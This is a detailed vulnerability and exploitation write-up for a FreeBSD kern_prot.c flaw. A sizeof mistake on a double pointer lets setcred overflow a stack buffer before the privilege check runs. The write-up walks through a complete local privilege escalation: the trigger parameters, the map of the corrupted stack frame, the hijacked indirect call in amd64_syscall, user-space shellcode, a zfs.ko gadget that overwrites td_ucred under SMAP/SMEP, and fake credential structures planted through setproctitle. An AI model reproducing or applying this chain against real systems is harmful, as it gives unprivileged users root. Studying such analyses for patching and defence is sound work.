File: sys/kern/kern_prot.c
Function: kern_setcred_copyin_supp_groups()
Lines: 528-533
The function signature uses a double pointer for the
groups argument:
    static int
    kern_setcred_copyin_supp_groups(struct setcred *const wcred,
        const u_int flags, gid_t *const smallgroups, gid_t **const groups)
Because groups has type gid_t **, the
expression sizeof(*groups) evaluates to
sizeof(gid_t *) == 8 on LP64, rather than the intended
sizeof(gid_t) == 4. This sizeof expression is used in
two places:
    /* line 528-530: allocation */
    *groups = wcred->sc_supp_groups_nb < CRED_SMALLGROUPS_NB ?
        smallgroups : malloc((wcred->sc_supp_groups_nb + 1) *
        sizeof(*groups), M_TEMP, M_WAITOK);    /* sizeof(*groups) == 8 */

    /* line 532-533: copyin */
    error = copyin(wcred->sc_supp_groups, *groups + 1,
        wcred->sc_supp_groups_nb * sizeof(*groups));    /* sizeof(*groups) == 8 */
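The type arithmetic behind sizeof(*groups) can be reproduced in user space. The following is a minimal sketch, not kernel code: demo_gid_t is a hypothetical stand-in for gid_t (assumed to be 32 bits wide, as the text states), and both helper names are invented for illustration. Because sizeof does not evaluate its operand, the helpers can be called with any pointer value, including NULL.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the kernel's gid_t (assumed 32-bit). */
typedef uint32_t demo_gid_t;

/*
 * Element size as the affected code computes it: a single dereference
 * of a demo_gid_t ** has type demo_gid_t *, so this is the size of a
 * pointer (8 on LP64).
 */
static size_t
elem_size_single_deref(demo_gid_t **const groups)
{
	return (sizeof(*groups));
}

/*
 * Element size as presumably intended: two dereferences reach the
 * demo_gid_t itself (4 bytes).
 */
static size_t
elem_size_double_deref(demo_gid_t **const groups)
{
	return (sizeof(**groups));
}
```

On an LP64 target the first helper returns 8 and the second returns 4, which is the factor-of-two mismatch described here.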
The allocation on the heap path is 2× oversized, which is
safe. However, for the stack path (when
sc_supp_groups_nb < CRED_SMALLGROUPS_NB == 16),
*groups is set to smallgroups, a
gid_t[CRED_SMALLGROUPS_NB] array declared as a local
variable in the caller user_setcred():
gid_t smallgroups[CRED_SMALLGROUPS_NB]; /* 16 * 4 = 64 bytes */
The copyin destination is *groups + 1 == &smallgroups[1],
which leaves 15 * 4 == 60 bytes of usable space. The
copyin copies sc_supp_groups_nb * sizeof(*groups) ==
sc_supp_groups_nb * 8 bytes. With the maximum stack-path
value of sc_supp_groups_nb == 15:
Bytes written: 15 * 8 = 120
Buffer capacity: 15 * 4 = 60
Overflow: 60 bytes past the end of smallgroups[]
The overflow is written with fully attacker-controlled data from
user space (wcred->sc_supp_groups points to an
attacker-supplied buffer).
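The byte counts above generalize to any group count on the stack path. The sketch below only restates that arithmetic; the DEMO_* constants and the function name are hypothetical, and the sizes (4-byte gid_t, 8-byte pointer) assume LP64 as in the text.

```c
#include <stddef.h>

#define DEMO_SMALLGROUPS_NB	16	/* mirrors CRED_SMALLGROUPS_NB == 16 */
#define DEMO_GID_SIZE		4	/* sizeof(gid_t), per the text */
#define DEMO_PTR_SIZE		8	/* sizeof(gid_t *) on LP64 (assumption) */

/*
 * Bytes written past the end of smallgroups[] for a given group count.
 * Returns 0 on the heap path (the allocation is oversized by the same
 * factor) and 0 when the copy still fits on the stack path.
 */
static size_t
demo_stack_overflow_bytes(size_t nb)
{
	size_t capacity, written;

	if (nb >= DEMO_SMALLGROUPS_NB)
		return (0);	/* heap path */

	/* The copy starts at &smallgroups[1], leaving 15 elements. */
	capacity = (DEMO_SMALLGROUPS_NB - 1) * DEMO_GID_SIZE;
	/* The copy length is computed with the pointer size. */
	written = nb * DEMO_PTR_SIZE;

	return (written > capacity ? written - capacity : 0);
}
```

Under these assumptions the copy first exceeds the buffer at a count of 8 (by 4 bytes) and reaches the 60-byte maximum at a count of 15.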
Trigger path and privilege-check ordering
The overflow happens in
kern_setcred_copyin_supp_groups(), which is called
from user_setcred() at line 604 -- before
the privilege check. The privilege check
(priv_check_cred(PRIV_CRED_SETCRED)) does not occur
until kern_setcred() is called at line 623, and within
that function at line 813. Any local user can trigger the
overflow by issuing:
setcred(SETCREDF_SUPP_GROUPS, &wcred, sizeof(wcred))
with wcred.sc_supp_groups_nb == 15 and
wcred.sc_supp_groups pointing to a
15 * 8 == 120-byte user-space buffer.
LPE technique (no SMAP, no SMEP)
The 60-byte overflow reaches every callee-saved register slot in
user_setcred()'s frame except saved RBP, although only the low
32 bits of saved r15 are overwritten.
Compiler ordering on 14.4 GENERIC places the corruption window at
[rbp - 0x40 .. -0x05]:
    buf[60..67]    mac.m_buflen
    buf[68..75]    mac.m_string
    buf[76..83]    td pointer spill          <- controls kern_setcred(td=...)
    buf[84..91]    saved rbx
    buf[92..99]    saved r12                 <- propagates up the stack
    buf[100..107]  saved r13
    buf[108..115]  saved r14
    buf[116..119]  low 32 bits of saved r15
The crucial observation is that sys_setcred()'s
prologue saves only rbp/r14/rbx -- it does
not save r12. The corrupted
r12 popped by user_setcred()'s
epilogue therefore propagates unchanged through
sys_setcred() up to amd64_syscall(),
which at +0x155 uses it as if it were the live
td_proc pointer:
    ffffffff8105b6e5: mov  rcx, [r12 + 0x3f8]   ; r12 fully controlled
    ffffffff8105b6ed: mov  rdi, rbx             ; rdi = real curthread
    ffffffff8105b6f0: mov  esi, eax             ; esi = setcred retval
    ffffffff8105b6f2: call [rcx + 0xc8]         ; INDIRECT CALL
This is a two-level indirect call entirely controlled by the
attacker: *(r12+0x3f8) supplies rcx, and
*(rcx+0xc8) is the call target.
Without SMAP, the kernel happily dereferences user-mode pointers, so both indirections can be satisfied by fake structures placed in user memory. Without SMEP, the indirect call may target user-space code.
The published no-SMAP exploit constructs a fake
struct sysentvec whose
sv_set_syscall_retval slot
(offset 0xc8) points to user-space shellcode.
The shellcode reads gs:[0] for the real curthread,
restores r12, then zeroes
cr_uid/cr_ruid/cr_svuid/cr_rgid/cr_svgid on the
real td_ucred and returns.
LPE technique (SMAP/SMEP, no info-leak)
The chain primitive at amd64_syscall+0x155 reaches
its target with rcx = K1 (an attacker-chosen 8-byte
value). If the target gadget writes rcx + 1 to
td->td_ucred, the current thread's credential
pointer is now set to any address we choose -- and if that
address happens to lie inside a kernel buffer we control (a
heap-resident pargs slab), the fake credential we
planted there immediately takes effect.
The gadget lives inside zfs.ko, in
ZSTD_initCStream_advanced:
    push rbp; mov rbp, rsp
    push r15; push r14; push rbx
    sub  rsp, 0x38
    mov  rbx, rdx
    mov  r14, rsi
    mov  r15, rdi                         ; r15 = arg1 = real_td (from chain)
    mov  rax, [rip + __stack_chk_guard]
    mov  [rbp - 0x20], rax                ; canary spill
    xor  eax, eax
    cmp  dword ptr [rbp + 0x2c], 0
    lea  rdx, [rcx + 1]                   ; rdx = K1 + 1
    cmovne rax, rdx
    test rcx, rcx
    mov  dword ptr [rdi + 0x430], 0
    cmovne rax, rdx                       ; rcx != 0 (always) -> rax = K1 + 1
    mov  qword ptr [rdi + 0x180], rax     ; *** td->td_ucred = K1+1 ***
The first cmovne depends on the dword at [rbp + 0x2c], but the
second fires whenever rcx != 0, so rax = K1 + 1 in either case.
The function continues with stores into
td+0x10..0x3c which corrupt
TAILQ_ENTRY scheduler-link fields with garbage drawn
from amd64_syscall's stack frame, then performs its
canary check and returns. Empirically the corruption is
survivable until the thread next reaches the scheduler.
Fake ucred placement (parent's pargs slab)
setproctitle(3) is available to unprivileged users; the
kernel allocates a 256-byte slot in the PARGS UMA zone and copies
up to 244 user bytes verbatim into the ar_args field.
The parent process's pargs slab P_base becomes our
fake_ucred:
    slot offset  field        value
    +0x20        cr_ref       0x7fffffff (high; defeats crfree)
    +0x28        cr_users     0x7fffffff
    +0x2c        cr_flags     0
    +0x60        cr_uid       0
    +0x64        cr_ruid      0
    +0x68        cr_svuid     0
    +0x6c        cr_ngroups   1
    +0x88        cr_prison    &prison0 (real kernel symbol)
    +0xb0        cr_groups    &prison0 (TRICK: see note)
    +0xb8        cr_agroups   1
    +0xc7        call target  ZSTD_initCStream_advanced
cr_groups trick: setting
cr_groups = &prison0 makes
cred->cr_groups[0] read the first 4 bytes of
struct prison, which is pr_id = 0 = wheel
gid. This lets the in-kernel
groupmember(0, cred) check inside the VFS chmod
path return 1 without a NULL dereference.
K1 placement (child's pargs slab)
The chain primitive reads K1 via
mov rcx, [r12 + 0x3f8]; we want
K1 = P_base - 1 so that K1+1 = P_base is
our fake ucred. We can't write P_base - 1 back into
the parent's slab (it already contains fake ucred fields), and we
can't use the td_name trick: UMA-heap addresses always have a NUL
byte at byte offset 4 of P_base - 1, which truncates
thr_set_name's strlcpy.
Solution: fork a CHILD process that does its own
setproctitle with the qword P_base - 1
placed at offset 0xd0 of its own pargs. The chain
then sets r12 = C_base + 0xd0 - 0x3f8, so that
[r12 + 0x3f8] = qword at (C_base + 0xd0) = K1.
The parent must not exit and must not setproctitle again before
the child triggers the chain -- otherwise pargs is freed and
P_base may be reused.
Self-resolving kernel symbols
The exploit resolves ZSTD_initCStream_advanced and
&prison0 at runtime through the unprivileged
kldnext(2)+kldsym(2) interface, so a
single binary is portable across the entire 14.4 patchset.
The kernel image itself contains a different ZSTD library with
incompatible struct offsets, so for the ZSTD lookup we skip
fileid=1 (kernel) and pick the symbol from a loaded
module (zfs.ko on a typical server).
Post-exploit
The thread has effective root for VFS operations. From here, installing persistence or spawning a privileged shell is a routine post-exploitation step.